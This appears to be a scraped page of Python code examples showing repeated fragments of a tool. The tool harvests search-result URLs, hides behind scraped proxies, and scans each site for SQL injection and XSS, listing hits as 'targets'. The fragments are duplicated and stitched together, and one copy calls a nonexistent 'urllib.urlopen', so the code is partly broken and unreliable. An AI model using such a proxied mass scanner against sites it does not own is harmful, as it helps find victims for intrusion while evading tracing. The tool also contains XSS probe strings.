def run_tests(links, testLevel=1, v=False):
    if (links == [] or links == None):
        bcolors.printFail("[-]Invalid input parameters! Exiting...")
        return
    proxyhandler = Proxy(True)
    proxyhandler.proxify()
    proxyhandler.validate_proxy()
    TestObjects = []
    for link in links:
        sqlI = True  # Used to check if we need to perform a second time-based sqlInjection test
        res = sql_error_scan(link, v)
        if (res != None):
            TestObjects.append(TestObject.TestObject(link, "SQLi", res))
            sqlI = False
        #Time based SQLi
        if (testLevel > 1 and sqlI):
            res = sql_time_scan(link, v)
            if (res != None):
                TestObjects.append(TestObject.TestObject(link, "SQLiT", res))
        #XSS
        if (testLevel > 2):
            res = xss_vuln_scan(link, v)
            if (res != None):
                TestObjects.append(TestObject.TestObject(link, "XSS", res))
    if (v):
        if (TestObjects != []):
            bcolors.printGreen("~*~*~*~*~PRINTING FOUND TARGETS~*~*~*~*~")
            for t in TestObjects:
                t.print_test()
        else:
            bcolors.printFail("~*~*~*~*~NO TARGETS FOUND~*~*~*~*~")
    return TestObjects
Пример #2
0
    def get_http_proxy(self, nrOfProxies=1, https=False, google=False):
        if (self.verbose):
            print("[*]Parameters: nrOfProxies=%d, https=%r, google=%r" %
                  (nrOfProxies, https, google))

        httpProxies = []
        tree = self._get_tree(data.url_http)
        found = 0
        i = 1
        bcolors.printGreen("Starting proxy scan!")
        while (found < nrOfProxies):
            proxy = tree.xpath(data.path + "[%d]/td/text()" % i)
            if (self.verbose):
                print("Found proxy: " + str(proxy))
            if (proxy == []):
                print("Could not find proxy!")
                return None
            if (self._validate(proxy, https, google)
                    and self.format_proxies(proxy)[0] not in self.blacklist):
                if (self.verbose):
                    bcolors.printGreen("Proxy meeting requirements found!")

                httpProxies.append(proxy)
                found += 1
            i += 1
        return httpProxies
def run_tests(links, testLevel = 1, v = False) :
    if (links == [] or links == None) :
        bcolors.printFail("[-]Invalid input parameters! Exiting...")
        return
    proxyhandler = Proxy(True)
    proxyhandler.proxify()
    proxyhandler.validate_proxy()
    TestObjects = []
    for link in links :
        sqlI = True # Used to check if we need to perform a second time-based sqlInjection test
        res = sql_error_scan(link, v)
        if(res != None) :
            TestObjects.append(TestObject.TestObject(link, "SQLi", res))
            sqlI = False
        #Time based SQLi    
        if (testLevel > 1 and sqlI ) :
            res = sql_time_scan(link, v)
            if(res != None) :
                TestObjects.append(TestObject.TestObject(link, "SQLiT", res))
        #XSS
        if (testLevel > 2) :
            res = xss_vuln_scan(link, v)
            if(res != None) :
                TestObjects.append(TestObject.TestObject(link, "XSS", res))
    if (v) :
        if (TestObjects != []) :
            bcolors.printGreen("~*~*~*~*~PRINTING FOUND TARGETS~*~*~*~*~")
            for t in TestObjects :
                t.print_test()
        else :
            bcolors.printFail("~*~*~*~*~NO TARGETS FOUND~*~*~*~*~")
    return TestObjects
def sql_time_scan(url, v = False) :
    #Get normal load-time
    req = urllib.request.Request(url, None, data.headers)
    timeStart = time.time()
    try :
        response = urllib.request.urlopen(req)
    except :
        return None

    latency = time.time() - timeStart
    if (v):
        print("[*]Latency is " + str(latency))
    socket.setdefaulttimeout(3*latency)

    for test in data.sleepCommands :
        req = urllib.request.Request(url + test, None, data.headers)
        try :
            response = urllib.urlopen(req)
        except socket.timeout :
            if (v) :
                bcolors.printGreen("[+] Time-based sql vulnerability found in url: ")
            return test
        except:
            continue
    return None
def sql_time_scan(url, v=False):
    #Get normal load-time
    req = urllib.request.Request(url, None, data.headers)
    timeStart = time.time()
    try:
        response = urllib.request.urlopen(req)
    except:
        return None

    latency = time.time() - timeStart
    if (v):
        print("[*]Latency is " + str(latency))
    socket.setdefaulttimeout(3 * latency)

    for test in data.sleepCommands:
        req = urllib.request.Request(url + test, None, data.headers)
        try:
            response = urllib.urlopen(req)
        except socket.timeout:
            if (v):
                bcolors.printGreen(
                    "[+] Time-based sql vulnerability found in url: ")
            return test
        except:
            continue
    return None
 def _strip_url(self, link) :
     regex = '(?=&sa=).+'
     url = ''.join(link)
     url = url.replace("['/url?q=", "")
     url = re.sub(regex, '', url)
     if (self.verbose) :
         bcolors.printGreen("[+]Extracted url: " + url)
     return url
def sql_error_scan(url,v = False) :
    req = urllib.request.Request(url + "'", None, data.headers)

    try : src = urllib.request.urlopen(req).read()
    except: return None

    for err in data.errorStrings :
        if err in str(src) :
            if (v) :
                bcolors.printGreen("[+]Found '" + err + "' reference in url: " + url)
            return "'"
Пример #8
0
 def __init__(self, useproxy, retries = None, verbose = False, sleep = 5):
     self.urls = [] # contains scraped urls
     self.blacklist = [] # contains blacklisted proxies
     self.useproxy = useproxy # dictates use of proxy
     self.retries = retries # sets the number of search retries, if None => unlimited
     self.verbose = verbose # sets verbosity level
     self.sleep = sleep # dictates sleep while searching for urls
     self.proxyhandler = None
     if (self.useproxy) :
         self.proxyhandler = Proxy(self.verbose)
         self.proxyhandler.proxify()
     if (self.verbose) :
         bcolors.printGreen("[+]Search object created!")
Пример #9
0
 def install_proxy(self, proxf, proxfhttps=None):
     if (proxfhttps == None):
         proxy = urllib.request.ProxyHandler({'http': proxf})
     else:
         proxy = urllib.request.ProxyHandler({
             'http': proxf,
             'https': proxfhttps
         })
     opener = urllib.request.build_opener(proxy)
     urllib.request.install_opener(opener)
     self.currentHttpProxy = proxf
     self.currentHttpsProxy = proxfhttps
     if (self.verbose):
         bcolors.printGreen("[+]New proxies installed!")
def sql_error_scan(url, v=False):
    req = urllib.request.Request(url + "'", None, data.headers)

    try:
        src = urllib.request.urlopen(req).read()
    except:
        return None

    for err in data.errorStrings:
        if err in str(src):
            if (v):
                bcolors.printGreen("[+]Found '" + err +
                                   "' reference in url: " + url)
            return "'"
Пример #11
0
    def __init__(self, useproxy, retries=None, verbose=False, sleep=5):
        self.urls = []  # contains scraped urls
        self.blacklist = []  # contains blacklisted proxies
        self.useproxy = useproxy  # dictates use of proxy
        self.retries = retries  # sets the number of search retries, if None => unlimited
        self.verbose = verbose  # sets verbosity level
        self.sleep = sleep  # dictates sleep while searching for urls
        self.cookie_jar = cookie_jar = http.cookiejar.CookieJar()

        self.proxyhandler = None
        if (self.useproxy):
            self.proxyhandler = Proxy(self.verbose)
            self.proxyhandler.proxify()
        if (self.verbose):
            bcolors.printGreen("[+]Search object created!")
Пример #12
0
 def install_proxy(self, proxf, proxfhttps = None) :
     if (proxfhttps == None) :
         proxy = urllib.request.ProxyHandler ({
             'http':proxf
         })
     else :
         proxy = urllib.request.ProxyHandler ({
             'http':proxf,
             'https':proxfhttps
         })
     opener = urllib.request.build_opener(proxy)
     urllib.request.install_opener(opener)
     self.currentHttpProxy = proxf
     self.currentHttpsProxy = proxfhttps
     if (self.verbose) :
         bcolors.printGreen("[+]New proxies installed!")
def xss_vuln_scan(url, v = False) :
    for test in data.xssStrings :
        req = urllib.request.Request(url + test, None, data.headers)
        try :
            response = urllib.request.urlopen(req)
            src = response.read()
        except socket.timeout:
            return None # Don't keep going if site is down
        except :
            continue

        if ('<script>alert("1VULN")' in str(src) or '<IMG SRC=javascript:alert' in str(src) or "<1VULN>" in str(src)) :
            if (v) :
                bcolors.printGreen("[+]Found XSS vulnerability in url: " + url)
            return test
    return None
def xss_vuln_scan(url, v=False):
    for test in data.xssStrings:
        req = urllib.request.Request(url + test, None, data.headers)
        try:
            response = urllib.request.urlopen(req)
            src = response.read()
        except socket.timeout:
            return None  # Don't keep going if site is down
        except:
            continue

        if ('<script>alert("1VULN")' in str(src)
                or '<IMG SRC=javascript:alert' in str(src)
                or "<1VULN>" in str(src)):
            if (v):
                bcolors.printGreen("[+]Found XSS vulnerability in url: " + url)
            return test
    return None
Пример #15
0
    def get_http_proxy(self, nrOfProxies=1,https=False,google=False) :
        if (self.verbose) :
            print("[*]Parameters: nrOfProxies=%d, https=%r, google=%r" % (nrOfProxies, https, google))
    
        httpProxies = []
        tree = self._get_tree(data.url_http)
        found = 0
        i = 1
        bcolors.printGreen("Starting proxy scan!")
        while(found < nrOfProxies) :
            proxy = tree.xpath(data.path + "[%d]/td/text()" % i)
            if (self.verbose) :
                print("Found proxy: " + str(proxy))
            if (proxy == []) :
                print("Could not find proxy!")
                return None;
            if (self._validate(proxy, https, google) and self.format_proxies(proxy) not in self.blacklist) :
                if (self.verbose) :
                    bcolors.printGreen("Proxy meeting requirements found!")

                httpProxies.append(proxy)
                found += 1
            i += 1
        return httpProxies